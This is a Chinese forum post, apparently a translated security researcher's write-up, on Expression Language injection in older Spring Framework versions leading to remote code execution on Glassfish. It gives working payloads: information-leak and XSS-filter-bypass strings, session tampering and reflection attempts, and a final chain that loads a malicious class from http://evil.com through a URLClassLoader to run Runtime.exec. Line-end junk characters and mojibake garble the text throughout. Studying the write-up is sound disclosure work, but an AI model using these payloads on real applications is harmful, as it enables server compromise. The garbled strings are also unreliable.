Remote Code with, s2 k1 {7 J2 f& K4 r; S5 S
Expression Language Injection; n9 e1 m7 j+ ^
Spring Framework脆弱性—DanAmodio
7 G( ~: l: _, f; W. D- X2 }' z \全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
U8 G% }2 k# k8 ?9 q7 U% ^可能会存在风险。
9 |" q6 k. r; H. @/ v在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的
8 d a/ Y5 [% x# }Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可3 F8 O( J9 {' F
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
8 h+ f( {9 m5 r$ {4 Z以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前" o" [2 m! s$ N% u; @6 @2 k+ y
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
3 P9 ]: L0 o% P1 _* S0 a+ Y$ ]由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但 ~* ?- Z/ p; J4 |' e
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版
2 u* A" y9 g. W; `# P$ M5 @7 X本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。
0 t! s ^" V$ R这些版本不支持禁用double EL resolution.# F% p6 z8 m( W. c: K9 u
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含
! u, q/ {) }) ^; A) cEL2.2容器上可能进行远程代码执行。: y- ?# X/ g0 `- b* X
这是一个原始信息泄露的攻击例子:
3 [) {1 s7 U! Q4 F+ Q7 ?/ [0 G/ }! v0 D请求:% V$ @. [: m$ v Q
ttp://vulnerable.com/foo?message=${applicationScope}; i m2 X9 R, s3 v- R% l
到达以下内容页面:0 }' _) z+ M; v& Z
结果将输出一些包含内部服务器信息calsspath 和本地工作目录2 o, d; v+ ^9 ?9 u: A7 r- {
你也可以做一些其他事情,如这样:8 q9 m6 U1 |" y" c' M- v E
${9999+1}
7 n$ N# W# S3 R还可以访问session 对象和beans
4 v! ]- X- J6 R4 O$ V0 L${employee.lastName}+ v+ J/ j4 Q4 f, s* M
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是- K/ r3 @1 w" Z4 D U( ^' t) [
EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
# i, E1 d4 z7 }/ I5 q西,比如XSS.
) k7 L$ U* ^! Q哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签% @2 L5 I9 z2 g
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
- K+ V. _- o$ O! ?) P呢?”
6 Q7 _* j0 w$ ?( T! F因此,我尝试巳缦拢�2 a) c% k4 R* ~5 S; L( {
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP; y! W# Q- ^- c3 t! E
P- H* g- S V6 z0 w
我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
6 T6 D* H% |( w5 h* }6 z回的文本被插入进了spring:message 标签。 G( y. Y4 j3 J# i& `
这里是一个最终绕过过滤的实例:- e' l% k0 P+ J! C
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ( k( n5 g6 p) O( V% |
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为
5 h+ e/ y, c) T. q0 }2 r9 W6 ]+ [什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
# {9 e( [+ b. v6 q经过一番研究,我学习到EL2.2 增加了方法调用。
' Z4 W, U- [7 d+ v我写了一个快速测试应用程序代码并且检测一些功能
4 Q! `/ G- h& P. H9 W# C( h${pageContext.request.getSession().setAttribute(“account”,”123456″)}
2 i9 _; q6 l) Y# W${pageContext.request.getSession().setAttribute(“admin”,true)}
5 X1 e+ Q. P2 {6 U好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
! m% J4 E- [+ o+ h8 w指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
- r, {6 c0 A4 _+ c" r% i+ E${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1" _% w/ r3 |& p( w! T" V
“, 1234)}5 @$ ?! W; X( A3 G V g
${“”.getClass().forName(“java.lang.Runtime”)}9 M! R# `( p4 L4 y* d% i3 ]4 [
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不; E7 N& l' ]" h
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
4 ~3 Z5 |' s2 ^$ A数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有# b4 D r: c# G2 I" w9 |
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
$ C+ F8 [& U+ ^. w方法签名invoke(Object obj, Object„ args)) _5 Q5 G7 U- }4 O( F' }
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问$ O) E q0 ~- c7 m; Y! k2 S, v
题,以让它可以工作起来。
/ I$ W; f0 f" B) r8 Q4 h% l漏洞利用:" r2 |) V& D' J- a# a3 ^4 _
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
# x6 B. y1 x! ^希望你们中的一些JAVA奇才告诉我我是如此的可笑。/ z! z: S p- `/ Z5 [; p
这里有一些我试过的失败的用例,为了试图让它工作的用例:8 K' K0 S' I) C: Z" f
写文件到文件系统6 I2 e* g; C& Z9 A9 s
试图载入org.springframework.expression.spel.standard.SpelExpressionParser.3 }& k2 g. m7 v0 b/ G& u3 o# U x& z
我认为这些可以很好的工作,但是我不能找到合适的类来载入。+ l1 x) Z% \+ \9 p8 ]0 g: b
${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}, g1 M0 }* `9 x. \9 H
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
8 a6 d" Q) e8 O7 Korg.springframework.expression.spel.standard.SpelExpressionParser not found& ?% y5 j( H; {1 T! M* l
by
' i- G/ |( i* {, Y/ A! z5 ]org.glassfish.web.javax.servlet.jsp [194]./ N0 o: y3 k/ D8 H
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
% l& }0 }0 t# O7 M/ y- |% y 利用反射来创建一个新的Runtime(and watch the world burn), e) U2 ]# d4 }4 w9 D
${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName( N# ]- o0 Q2 Z
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}
$ a T8 P% v7 Y8 Y0 M: ~6 }${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
, e# `1 H5 B# g" K' K; I, W 使用java.lang.ProcessBuilder5 K$ Z' j% Z; A# B8 R) G" T" T) v
用表达式语言来评估表达式语言
) l7 Q; ~# w% a5 `: ^5 JExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.5 I0 A' a8 w' P, h
${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request
! E5 D! J9 M$ C“,”".getClass(),null)}
- w" V# m; F3 \8 k 创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
) j$ t; e, e8 K8 ~/ R: u我在使用一个空数组通过Method.invoke()时失败了很多次* w x3 ~' q- m9 q5 u4 W" Q( @; y
“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
. p9 D3 p- o. S6 x _.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A
" v" h- b" Y/ |rrayList”).newInstance().toArray())
! K5 G3 t8 L4 B/ R yjava.lang.IllegalArgumentException: wrong number of arguments- K$ t. T# J, O5 d. J4 q; D
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
9 }4 F3 Z% d7 s" i4 A6 }! S& j以创建一个恶意class文件并且指向类装载器.
8 u& }8 V% V% X# ~# g, s我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:5 m& g! c) a+ q# \* b
public class Malicious {
$ D& [1 Z1 P1 X/ _6 R+ l8 H* vpublic Malicious() {0 n9 H) y2 [# E: O) w l' |3 i U
try {6 |2 v7 t5 G' C- n, |: L" o3 V
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
% e& `" s/ E8 D+ U$ ?) Ujava.lang.Runtime.getRuntime().exec(“calc.exe”); //Win' x( U9 q- r( n* y: D$ V
} catch (Exception e) {
( c/ L* O' Z+ I/ Y# |1 n}
/ z2 H. P0 C% N: U}( L M9 c6 ?9 V! z, j9 q6 \
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
. J: u. h4 X, n7 q Z% ]* d8 o' \7 n话中,因此它可以被使用.8 B) F1 p: n* r4 W3 A1 C8 T5 j
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName( T) k) {" `+ a0 l
(“java.util.ArrayList”).newInstance())}
1 H9 s Q& ~" ^4 t2 hURLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
/ M9 [* ]* D! X' k9 e5 F! U; `. M一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和8 C3 r" M5 S5 Y4 T: l
getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个) R: q5 H* r9 s, g
我们可以调用的create(string)方法,然后转换对一个URL对象。
2 t$ B& ]% F f; O, X2 G' U* w, ? h${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh2 h+ x) X4 t+ n' e6 Z1 Q
ere/malicious/classfile/is/located/”).toURL())}
1 G" \5 ?9 x" J4 E# m然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,, J( w, y" L/ r7 q7 ?4 P+ p
恶意类文件被装载并创建,触发远程代码.2 p1 k7 g( r8 D! E* ]* k" H5 T
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte
3 G! {1 D5 t l& k, H. fxt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
% C" q1 Q: L% FgetClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance
# b/ [+ i2 J, o& M()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对